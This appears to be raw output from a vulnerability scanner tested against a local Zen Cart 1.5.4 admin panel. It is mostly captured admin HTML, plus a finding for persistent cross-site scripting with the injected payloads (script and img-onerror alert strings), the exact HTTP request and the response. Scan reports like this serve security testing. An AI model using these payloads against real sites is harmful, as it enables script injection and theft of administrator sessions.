                <li><a href="http://localhost:8081/zen-cart/admin1/products_price_manager.php">Products Price Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_name_manager.php">Option Name Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php">Option Value Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/attributes_controller.php">Attributes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/downloads_manager.php">Downloads Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_name.php">Option Name Sorter</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/option_values.php">Option Value Sorter </a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/manufacturers.php">Manufacturers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/reviews.php">Reviews</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/specials.php">Specials</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/featured.php">Featured Products</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/salemaker.php">SaleMaker</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/products_expected.php">Products Expected</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Modules</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=payment">Payment</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=shipping">Shipping</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/modules.php?set=ordertotal">Order Total</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Customers</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/customers.php">Customers</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders.php">Orders</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/group_pricing.php">Group Pricing</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Locations / Taxes</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/countries.php">Countries</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/zones.php">Zones</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php">Zones Definitions</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_classes.php">Tax Classes</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/tax_rates.php">Tax Rates</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Localization</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/currencies.php">Currencies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/languages.php">Languages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/orders_status.php">Orders Status</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Reports</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers.php">Customer Orders-Total</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_customers_referrals.php">Customers Referral</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_lowstock.php">Products Low Stock</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_purchased.php">Products Purchased</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/stats_products_viewed.php">Products Viewed</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Tools</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/template_select.php">Template Selection</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/layout_controller.php">Layout Boxes Controller</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/banner_manager.php">Banner Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/mail.php">Send Email</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/newsletters.php">Newsletter and Product Notifications Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Server/Version Info</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/whos_online.php">Who's Online</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/store_manager.php">Store Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/developers_tool_kit.php">Developers Tool Kit</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/ezpages.php">EZ-Pages</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/define_pages_editor.php">Define Pages Editor</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/sqlpatch.php">Install SQL Patches</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Gift Certificate/Coupons</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/coupon_admin.php">Coupon Admin</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_queue.php">Gift Certificates Queue</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_mail.php">Mail Gift Certificate</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/gv_sent.php">Gift Certificates sent</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Admin Access Management</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/profiles.php">Admin Profiles</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/users.php">Admin Users</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_page_registration.php">Admin Page Registration</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/admin_activity.php">Admin Activity Logs</a></li>
              </ul>
    </li>
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Extras</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_artists.php">Record Artists</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/record_company.php">Record Companies</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/music_genre.php">Music Genre</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_manager.php">Media Manager</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/media_types.php">Media Types</a></li>
              </ul>
    </li>
      </ul>
</div>
<!-- header_eof //-->

<!-- body //-->
<table border="0" width="100%" cellspacing="2" cellpadding="2">
  <tr>
<!-- body_text //-->
    <td width="100%" valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2">
      <tr>
        <td width="100%"><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td class="pageHeading">Zone Definitions - Taxes, Payment and Shipping</td>
            <td class="pageHeading" align="right"><img src="images/pixel_trans.gif" border="0" alt="" width="57" height="40"></td>
          </tr>
        </table></td>
      </tr>
      <tr>
        <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
          <tr>
            <td valign="top">
LEGEND: &nbsp;
<img src="images/icon_status_green.gif" border="0" alt="">: Taxes &amp; Zones Defined&nbsp;&nbsp;&nbsp;
<img src="images/icon_status_yellow.gif" border="0" alt="">: Zones Defined but not Taxes &nbsp;&nbsp;&nbsp;
<img src="images/icon_status_red.gif" border="0" alt="">: Not Configured &nbsp;&nbsp;&nbsp;<br />
            <table border="0" width="100%" cellspacing="0" cellpadding="2">
              <tr class="dataTableHeadingRow">
                <td class="dataTableHeadingContent">Zone Name</td>
                <td class="dataTableHeadingContent">Zone Description</td>
                <td class="dataTableHeadingContent" align="center">Status</td>
                <td class="dataTableHeadingContent" align="right">Action&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=36'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=36&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;admin</td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=36"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=6'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=6&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;admin</td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=6"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=7'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=7&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;admin</td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=7"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=8'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=8&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;admin</td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=8"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=9'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=9&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;admin</td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=9"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=10'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=10&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;admin</td>
                <td class="dataTableContent">c3p0z14514152.38067r2d2z</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=10"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=11'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=11&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;admin</td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=11"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=35&action=list'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=35&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;admin</td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="">&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=13'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=13&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;admin</td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=13"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=14'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=14&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;admin</td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=14"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=15'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=15&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;admin</td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=15"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=32'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=32&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;admin</td>
                <td class="dataTableContent"><script>alert(14514152.38317)</script></td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=32"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=19'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=19&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;alert(14514152.38167)</td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=19"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=26'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=26&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;alert(14514152.38247)<a></td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=26"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=12'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=12&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;c3p0z14514152.38087r2d2z</td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=12"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=5'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=5&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;c3p0z1a2a3ar2d2z</td>
                <td class="dataTableContent">testval</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_red.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=5"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
                  <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=1'">
                <td class="dataTableContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=1&action=list"><img src="images/icons/folder.gif" border="0" alt="Folder" title=" Folder "></a>&nbsp;Florida</td>
                <td class="dataTableContent">Florida local sales tax zone</td>
                <td class="dataTableContent" align="center"><img src="images/icon_status_green.gif" border="0" alt=""></td>
                <td class="dataTableContent" align="right"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=1"><img src="images/icon_info.gif" border="0" alt="Info" title=" Info "></a>&nbsp;</td>
              </tr>
              <tr>
                <td colspan="4"><table border="0" width="100%" cellspacing="0" cellpadding="2">
                  <tr>
                    <td class="smallText">Displaying <b>21</b> to <b>37</b> (of <b>37</b> tax zones)</td>
                    <td class="smallText" align="right"><form name="pages" action="http://localhost:8081/zen-cart/admin1/geo_zones.php" method="get"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=1" class="splitPageLink">&lt;&lt;</a>&nbsp;&nbsp;Page <select rel="dropdown" name="zpage" onChange="this.form.submit();">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
</select>
 of 2&nbsp;&nbsp;&gt;&gt;</form></td>
                  </tr>
                </table></td>
              </tr>
              <tr>
                <td align="right" colspan="4"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=35&action=new_zone"><img src="includes/languages/english/images/buttons/button_insert.gif" border="0" alt="Insert" title=" Insert "></a></td>
              </tr>
            </table>
            </td>
            <td width="25%" valign="top">
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr class="infoBoxHeading">
    <td class="infoBoxHeading"><b>admin</b></td>
  </tr>
</table>
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr>
    <td align="center" class="infoBoxContent"><a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=35&action=edit_zone"><img src="includes/languages/english/images/buttons/button_edit.gif" border="0" alt="Edit" title=" Edit "></a> <a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=35&action=delete_zone"><img src="includes/languages/english/images/buttons/button_delete.gif" border="0" alt="Delete" title=" Delete "></a> <a href="http://localhost:8081/zen-cart/admin1/geo_zones.php?zpage=2&zID=35&action=list"><img src="includes/languages/english/images/buttons/button_details.gif" border="0" alt="Details" title=" Details "></a></td>
  </tr>
  <tr>
    <td align="center" class="infoBoxContent"></td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br>Number of Zones: 0</td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br>Number of Tax Rates: 0</td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br>Date Added: 12/30/2015</td>
  </tr>
  <tr>
    <td class="infoBoxContent"><br>Description:<br>testval</td>
  </tr>
</table>
            </td>
          </tr>
        </table></td>
      </tr>
    </table></td>
<!-- body_text_eof //-->
  </tr>
</table>
<!-- body_eof //-->

<!-- footer //-->
<table border="0" width="100%" cellspacing="10" cellpadding="10">
  <tr>
    <td align="center" class="smallText" height="100" valign="bottom"><a href="http://www.zen-cart.com" target="_blank"><img src="images/small_zen_logo.gif" alt="Zen Cart:: the art of e-commerce" border="0"></a><br /><br />E-Commerce Engine Copyright &copy; 2003-2015 <a href="http://www.zen-cart.com" target="_blank">Zen Cart&reg;</a><br /><a href="http://localhost:8081/zen-cart/admin1/server_info.php">Zen Cart v1.5.4/v1.5.4</a></td>
  </tr>
</table>
<!-- footer_eof //-->
<br>
</body>
</html>

Finding 3.47: Persistent Cross-Site Scripting.

Current injection value: 132312<! XSS="><img src=xx:x onerror=alert(14507304.25877)//">

Injection URI: http://localhost:8081/zen-cart/admin1/categories.php?set_display_categories_dropdown=1&cID=1&cPath=c3p0z14507304.25907r2d2z&page=0&vcheck=yes
Injected item: GET : cPath
Injection value: <! XSS="><img src=xx:x onerror=alert(14507304.25907)//">

Reflection URI: http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=update_value&value_page=1
Detection string: alert(14507304.25907)

HTTP Request
POST /zen-cart/admin1/options_values_manager.php?action=update_value&value_page=1 HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/20080630 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: 
Connection: keep-alive
Referer: http://localhost:8081/zen-cart/admin1/options_values_manager.php?action=update_option_value&value_id=4&value_page=1
Cookie: zenAdminID=qj17gn2vluuq7iknle1aefn3r3
Content-Type: application/x-www-form-urlencoded
Content-Length: 203

securityToken=f30ffae6475aa7c037f703d7983c8eff&value_id=4&value_name%5B2%5D=admin&value_name%5B1%5D=admin&products_options_values_sort_order=132312<! XSS="><img src=xx:x onerror=alert(14507304.25877)//">

HTTP Response
HTTP/1.1 200 OK
Date: Mon, 21 Dec 2015 22:30:15 GMT
Server: Apache
X-Powered-By: PHP/5.4.37
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

<!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="ltr" lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Zen Cart!</title>
<link rel="stylesheet" type="text/css" href="includes/stylesheet.css">
<link rel="stylesheet" type="text/css" href="includes/cssjsmenuhover.css" media="all" id="hoverJS">
<script language="javascript" src="includes/menu.js"></script>
<script language="javascript"><!--
function go_option() {
  if (document.option_order_by.selected.options[document.option_order_by.selected.selectedIndex].value != "none") {
    location = "http://localhost:8081/zen-cart/admin1/options_values_manager.php?option_page=1&option_order_by="+document.option_order_by.selected.options[document.option_order_by.selected.selectedIndex].value;
  }
}
//--></script>
<script type="text/javascript">
  <!--
  function init()
  {
    cssjsmenu('navbar');
    if (document.getElementById)
    {
      var kill = document.getElementById('hoverJS');
      kill.disabled = true;
    }
  }
  // -->
</script>
</head>
<body onLoad="init()">
<!-- header //-->
<table border="0" width="100%" cellspacing="0" cellpadding="2">
  <tr class="messageStackCaution">
    <td class="messageStackCaution"><img src="images/icons/warning.gif" border="0" alt="Warning" title=" Warning ">&nbsp;Possible Duplicate Options Value Added  <b>TESTVAL</b> :  - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 0 - 2 - 3 - 4</td>
  </tr>
  <tr class="messageStackCaution">
    <td class="messageStackCaution"><img src="images/icons/warning.gif" border="0" alt="Warning" title=" Warning ">&nbsp;MISSING LANGUAGE FILES OR DIRECTORIES ... Testval admin</td>
  </tr>
</table>
<!-- All HEADER_ definitions in the columns below are defined in includes/languages/english.php //-->
<table border="0" width="100%" cellspacing="0" cellpadding="0" class="header">
  <tr>
    <td align="left" valign="top" height="70px" width="200px"><a href="http://localhost:8081/zen-cart/admin1/index.php"><img src="images/logo.gif" border="0" alt="Admin Powered by Zen Cart :: The Art of E-Commerce" title=" Admin Powered by Zen Cart :: The Art of E-Commerce "></a></td>
    <td colspan="2" align="left"><table width="100%"><tr>
    <td align="left" class="main" valign="top"></td>
    <td align="right" class="main" valign="top"><a href="http://localhost:8081/zen-cart/admin1/options_values_manager.php?value_page=1&vcheck=yes"><img src="includes/languages/english/images/buttons/button_check_new_version.gif" border="0" alt="Check for Updates to Zen Cart" title=" Check for Updates to Zen Cart "></a><br />(You are presently using:  v1.5.4)</td>
    </tr></table></td>
  </tr>
</table>
<table border="0" cellspacing="0" cellpadding="0" width="100%">
  <tr class="headerBar">

    <td class="headerBarContent" align="left">
      <form name="languages" action="http://localhost:8081/zen-cart/admin1/options_values_manager.php" method="get">Define Language:&nbsp;&nbsp;<select rel="dropdown" name="language" onChange="this.form.submit();">
<option value="en" selected="selected">admin</option>
</select>
</form>    </td>
    <td class="headerBarContent" align="center">
Monday 21 Dec 2015 10:30:16 PM&nbsp;+0000 GMT&nbsp;[::1]<br />CMP-SL-73CF1 - Europe/London - English_United States.1252</td>

    <td class="headerBarContent" align="right">
        <a href="http://localhost:8081/zen-cart/admin1/index.php" class="headerLink">Admin Home</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/index.php?main_page=" class="headerLink" target="_blank">Online Catalog</a>&nbsp;|&nbsp;
        <a href="http://www.zen-cart.com/" class="headerLink" target="_blank">Support Site</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/server_info.php" class="headerLink">Version</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/admin_account.php" class="headerLink">Account</a>&nbsp;|&nbsp;
        <a href="http://localhost:8081/zen-cart/admin1/logoff.php" class="headerLink">Logoff</a>&nbsp;    </td>
  </tr>
</table>
<div id="navbar">
  <ul class="nde-menu-system" onmouseover="hide_dropdowns('in');" onmouseout="hide_dropdowns('out');">
        <li>
      <a class="top" href="http://localhost:8081/zen-cart/admin1/alt_nav.php">Configuration</a>
      <ul>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=1">My Store</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=2">Minimum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=3">Maximum Values</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=4">Images</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=5">Customer Details</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=7">Shipping/Packaging</a></li>
                <li><a href="http://localhost:8081/zen-cart/admin1/configuration.php?gID=8">Product Listing</a></li>
